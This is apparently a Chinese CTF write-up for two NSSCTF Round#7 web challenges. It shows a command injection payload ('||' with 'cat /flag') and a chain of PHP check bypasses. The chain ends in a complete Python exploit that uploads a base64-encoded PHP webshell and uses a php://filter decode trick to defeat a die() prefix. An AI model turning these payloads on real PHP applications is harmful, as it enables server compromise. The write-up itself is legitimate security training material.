NSSCTF Round#7 Team ez_rce和0o0讲解
强烈建议NSSCTF延长时间,大过年的逛亲戚回来就剩两个小时了。。。。
ez_rce
<!-- A EZ RCE IN REALWORLD _ FROM CHINA.TW -->
<!-- By 探姬 -->
<?PHP
if(!isset($_POST["action"]) && !isset($_POST["data"]))
show_source(__FILE__);
putenv('LANG=zh_TW.utf8');
$action = $_POST["action"];
$data = "'".$_POST["data"]."'";
$output = shell_exec("/var/packages/Java8/target/j2sdk-image/bin/java -jar jar/NCHU.jar $action $data");
echo $output;
?>
刚看到差点被这个被这个吓到,还以为第一题就是java安全,仔细一看就是运行了一个jar文件,然后我们可以自定义action和data的值,这里就可以用到||这个了,||旁边两个都可以执行的,最后闭合一下单引号就可以了。
post传:action=||&data='cat /flag'
0o0
这里没有发现什么有用的东西,我们去扫一扫目录看看,然后我们就发现了,一个关键的文件,.D
//我们直接使用wget下载过来
wget http://43.143.7.97:28537/.DS_Store
vim -r尝试恢复一下,但是没有成功,接下来就直接看看里面的内容,有没有什么信息。
这里我们看到了一个文件,我们尝试访问一下。
//Ns_SCtF.php
<?php
error_reporting(0);
highlight_file(__FILE__);
$NSSCTF = $_GET['NSSCTF'] ?: '';
$NsSCTF = $_GET['NsSCTF'] ?: '';
$NsScTF = $_GET['NsScTF'] ?: '';
$NsScTf = $_GET['NsScTf'] ?: '';
$NSScTf = $_GET['NSScTf'] ?: '';
$nSScTF = $_GET['nSScTF'] ?: '';
$nSscTF = $_GET['nSscTF'] ?: '';
if ($NSSCTF != $NsSCTF && sha1($NSSCTF) === sha1($NsSCTF)) {
if (!is_numeric($NsScTF) && in_array($NsScTF, array(1))) {
if (file_get_contents($NsScTf) === "Welcome to Round7!!!") {
if (isset($_GET['nss_ctfer.vip'])) {
if ($NSScTf != 114514 && intval($NSScTf, 0) === 114514) {
$nss = is_numeric($nSScTF) and is_numeric($nSscTF) !== "NSSRound7";
if ($nss && $nSscTF === "NSSRound7") {
if (isset($_POST['submit'])) {
$file_name = urldecode($_FILES['file']['name']);
$path = $_FILES['file']['tmp_name'];
if(strpos($file_name, ".png") == false){
die("NoO0P00oO0! Png! pNg! pnG!");
}
$content = file_get_contents($path);
$real_content = '<?php die("Round7 do you like");'. $content . '?>';
$real_name = fopen($file_name, "w");
fwrite($real_name, $real_content);
fclose($real_name);
echo "OoO0o0hhh.";
} else {
die("NoO0oO0oO0!");
}
} else {
die("N0o0o0oO0o!");
}
} else {
die("NoOo00O0o0!");
}
} else {
die("Noo0oO0oOo!");
}
} else {
die("NO0o0oO0oO!");
}
} else {
die("No0o0o000O!");
}
} else {
die("NO0o0o0o0o!");
} NO0o0o0o0o!
我们拆开来一个一个分析。
if ($NSSCTF != $NsSCTF && sha1($NSSCTF) === sha1($NsSCTF))
这里我们可以通过数组绕过
payload:
?NSSCTF[]=1&NsSCTF[]=2
if (!is_numeric($NsScTF) && in_array($NsScTF, array(1)))
这里is_numeric是检测我们传入的东西是不是另一个数字或者一个数字字符串,因为有!,所以我们传入的东西不能是数字,但是后面in_array是查询我们传入的值有没有在数组中,他的数组中只有一个1,所以我们需要传入一个1
这里我们可以使用%00截断
payload: &NsScTF=1%00
if (file_get_contents($NsScTf) === "Welcome to Round7!!!")
file_get_contents是可以读取文件内容的,这里我们可以利用data伪协议
payload:&NsScTf=data://text/plain,Welcome to Round7!!!
if (isset($_GET['nss_ctfer.vip']))
这里有特殊字符,_这个十分重要,我们假如按正常的参数输入,他是不会接收的,我们要使用[代替_。
payload:&nss[ctfer.vip=true
if ($NSScTf != 114514 && intval($NSScTf, 0) === 114514)
这里不能等于114514,但是经过intval函数要等于114514,这里base参数设置的就是0他会根据我们传入的值判断要转换的整数。
这里我们可以通过科学计数法绕过
payload:&NSScTf=114514e1
$nss = is_numeric($nSScTF) and is_numeric($nSscTF) !== "NSSRound7";
if ($nss && $nSscTF === "NSSRound7")
这里还是is_numeric函数,分析下来nSScTF只要传递一个数字就可以了,然后就是nSscTF其实就是直接传NSSRound7就可以了
payload:&nSScTF=1&nSscTF=NSSRound7
//完整
Ns_SCtF.php?NSSCTF[]=1&NsSCTF[]=2&NsScTF=1%00&NsScTf=data://text/plain,Welcome to Round7!!!&nss[ctfer.vip=true&NSScTf=114514e1&nSScTF=1&nSscTF=NSSRound7
if (isset($_POST['submit'])) {
$file_name = urldecode($_FILES['file']['name']);
$path = $_FILES['file']['tmp_name'];
if(strpos($file_name, ".png") == false){
die("NoO0P00oO0! Png! pNg! pnG!");
}
$content = file_get_contents($path);
$real_content = '<?php die("Round7 do you like");'. $content . '?>';
$real_name = fopen($file_name, "w");
fwrite($real_name, $real_content);
fclose($real_name);
echo "OoO0o0hhh.";
} else {
die("NoO0oO0oO0!");
这里分析一下我们先post给subimt随便输入一个值就可以了,然后就是他会进入判断中,然后就是通过file参数来文件上传,这里还会进行一次url解密,然后他还会生成一个临时文件,然后就是strpos函数,让文件名中必须有.png,然后就会读取临时文件赋值给content,然后和die组成一个新的php代码,然后在当前目录中生成一个和我们上传的文件,一样名字的文件,然后将那一串代码写进去。
关于strpos哪里我们可以使用1.png.php来让文件进行php操作。
然后我们就需要绕过die函数,这里和绕过死亡exit很像,这里给大家探姬写的文章,感觉写的很厉害。
这里的意思很简单,我们把一串base64写入那里,然后使用伪协议将他进行一次解码,从而使die没了,当然不止可以使用base64还有很多方法,这里还可以参考这里死亡exit
//<?php system('echo 1');?> base64编码
PD9waHAgc3lzdGVtKCdlY2hvIDEnKTs/Pg==
//我们将上面那一串当做文件内容上传,这时候生成的文件的内容
//注意这里我们要补3个字母
<?php die("Round7 do you like");aaaPD9waHAgc3lzdGVtKCdlY2hvIDEnKTs/Pg==?>
这里解码我们发现前面就成了乱码,这里就可以解析我们上传的内容了。
但是怎么才能让他解码,这里我们可以使用php://filter/convert.base64-decode/resource=1.png.php,记得上面有一次url解码,所以我们要进行加密一次
import requests
from base64 import b64encode
import re
def get_flag(URL):
url = f"{URL}/Ns_SCtF.php?NSSCTF[]=1&NsSCTF[]=2&NsScTF=1%00&NsScTf=data://text/plain,Welcome%20to%20Round7!!!&nss[ctfer.vip=true&NSScTf=114514e1&nSScTF=1&nSscTF=NSSRound7"
data = {'submit':1}
payload = str(b64encode(b"<?php system('cat /home/f1ag');?>")) #修改为自己想要执行的命令
payload = re.findall(r"b'(.*?)'",payload)[0]
file1 = {'file': ('1.png.php', f"aaa{payload}")}
file2 = {'file': ('%70%68%70%3a%2f%2f%66%69%6c%74%65%72%2f%63%6f%6e%76%65%72%74%2e%62%61%73%65%36%34%2d%64%65%63%6f%64%65%2f%72%65%73%6f%75%72%63%65%3d%31%2e%70%6e%67%2e%70%68%70', f"aaa{payload}")}
requests.post(url,data=data,files=file1)
requests.post(url,files=file2,data=data)
nssctf_text3 = requests.post(f'{URL}/1.png.php').text
print(nssctf_text3)
if __name__ == "__main__":
get_flag("http://43.143.7.127:28479")